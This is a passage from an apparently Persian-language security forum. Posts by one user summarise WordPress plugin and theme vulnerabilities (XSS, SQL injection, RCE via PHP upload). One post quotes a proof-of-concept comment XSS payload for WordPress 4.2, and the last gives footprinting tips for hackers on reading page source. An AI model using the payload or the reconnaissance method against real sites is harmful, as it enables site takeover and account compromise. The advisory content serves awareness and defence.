    بر اساس آخرین گزارش امنیتی تمامی پلاگین‌ها و تم‌های وردپرس که از genericons package استفاده می‌کنند. از این آسیب پذیری رنج میبرند DOM-based این آسیب‌پذیری به دلیل وجود فایل نا امن در genericons package به وجود اماده هست. همان طور که در پست قبلی گزارش شد که حفره Cross Site Script در پوسته پیشفرض Twenty Fifteen وردپرس وجود دارد همچنین وجود این حفره در پلاگین‌ JetPack که بیش از یک‌میلیون بار نصب‌ شده است و تم TwentyFifteen که به‌طور پیش‌فرض در وردپرس موجود است تایید شده است. genericons package شامل فایل ناامن example.html می‌شود که با سوءاستفاده هکرها می‌توان کدهای مخرب جاوا اسکریپت را اجرا کرد و کنترل سایت را به دست گرفت. همچنین توصیه میشود جهت جلوگیری از نفوذ فایل example.html پاک یا اجازه دسترسی به این فایل داده نشود.
  22. Rednofozi

    Hacking-Bugs

    حفره Sql Injection در Ajax Store Locator وردپرس اسیب پذیری Sql Injection در پلاگین وردپرس در exploits-db ثبت شد آسیب پذیری در صفحه زیر در سایت وردپرسی قابل استفاده میباشد. توضیحات بیشتر
  23. Rednofozi

    Hacking-Bugs

    به گزارش Exploit-db حفره امنیتی از پلاگین WP Marketplace وردپرس کشف شد که اجازه خرابکاری و نفوذ به وب سایت رو به نفوذگر میده حفره در ورژن 2.4.0 این پلاگین به ثبت رسید و طبق گزارش ها ها حفره در نسخه های قبل هم از قبل وجود داشته است. حفره امنیتی WP Marketplace از نوع Remote Code Execution هست که به نفوذگر با این حفره می تواند اقدام به اجرای دستورات کدهای PHP دلخواه بوسیله آپلود کردن یک اسکریپت PHP مخرب مورد سوء استفاده از آسیب پذیری قرار بگیرد.
  24. Rednofozi

    Hacking-Bugs

    نسخه فعلی وردپرس یعنی ورژن 4.2 که چند روز پیش منتشر شد دارای آسیب پذیری XSS میباشد مهاجم با ارسال کد جاوا اسکریپت در قسمت نظرات میتواند کنترل وب سایت وردپرسی را در دست بگیرد. با حفره Cross Site Script مهاجم می تواند رمز عبور مدیر را تغییر یا حساب کاربری جدیدی در سایت ایجاد کند و یا انجام هر چیز دیگری که مدیر در حال حاضر وارد شده می تواند بر روی سیستم هدف انجام دهد. آسیب پذیری جدید XSS در این ورژن به تازگی منتشر شده که سایت های وردپرسی مورد حمله نفوذگر ها قرار داده است. در حال حاضر وردپرس ورژن های 4.2, 4.1.2, 4.1.1, 3.9.3. تمامی آسیب پذیر میباشد. <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>
  25. استفاده از HTML Source Code در فوت پرینتینگ در بیشتر مواقع نفوذگر میتواند با خواندن HTML Source Code صفحات یک سایت اطلاعات خوبی در خصوص وب سایت مورد نظر بدست بیاورید. اطلاعاتی همچون سیستم مدیریت محتوا مورد استفاده بر روی سایت ، زبان برنامه نویسی مدیریت محتوا و اطلاعات کاربردی دیگر با خواندن سورس صفحه HTML Source Code قابل جمع آوری میباشد. یکی از مهمترین اطلاعاتی که در این Source Code ها می توانید بدست بیاورید اطلاعاتی است که در قسمت توضیحات درباره مدیریت محتوا نوشده شده است را میتوان مورد استفاده قرار داد این توضیحات هم می توانند بصورت دستی و هم بصورت خودکار توسط سیستم مدیریت محتوا استفاده شوند و بیشتر مدیران سایت ها که از این مدیریت محتوا ها استفاده می کنند چندان توجهی به اطلاعات نوشته شده در مورد مدیریت محتوا نمی کنند که برای یک هکر می تواند بسیار مفید باشد. شما با استفاده از این اطلاعات می توانید متوجه شوید که در پشت صحنه چه اتفاقی در حال رخ دادن است. http://uupload.ir/files/s051_sa.png در بیشتر موارد می توانید در سورس صفحه اطلاعات مهمی همچون شماره تماس یا اطلاعات تماس مدیر یا برنامه نویس وب سایت را پیدا کنید همچنین به طور مثال در سیستم مدیریت محتوا وردپرسمیتوان با خواندن سورس صفحه اطلاعاتی همچون ورژن نسخه از مدیریت محتوا وردپرس نام پوسته و اطلاعات مهمی همچون پلاگین های نصب شده را بدست آورد که برای نفوذ به یک وب سایت مهم ترین نکته پیدا کردن اطلاعات مهمی همچون نسخه استفاده شده و موارد دیگر میباشد. همچنین استفاده از این روش به شما امکان پیدا کردن دایرکتوری ها و فایل های مخفی را در سیستم می دهد. علاوه بر این در بعضی قسمت ها شما می توانید یک سری اطلاعات نادرست را به صورت تصادفی وارد کنید و عکس العمل اسکریپت ها در مقابل این داده های اشتباه را تحلیل کنید.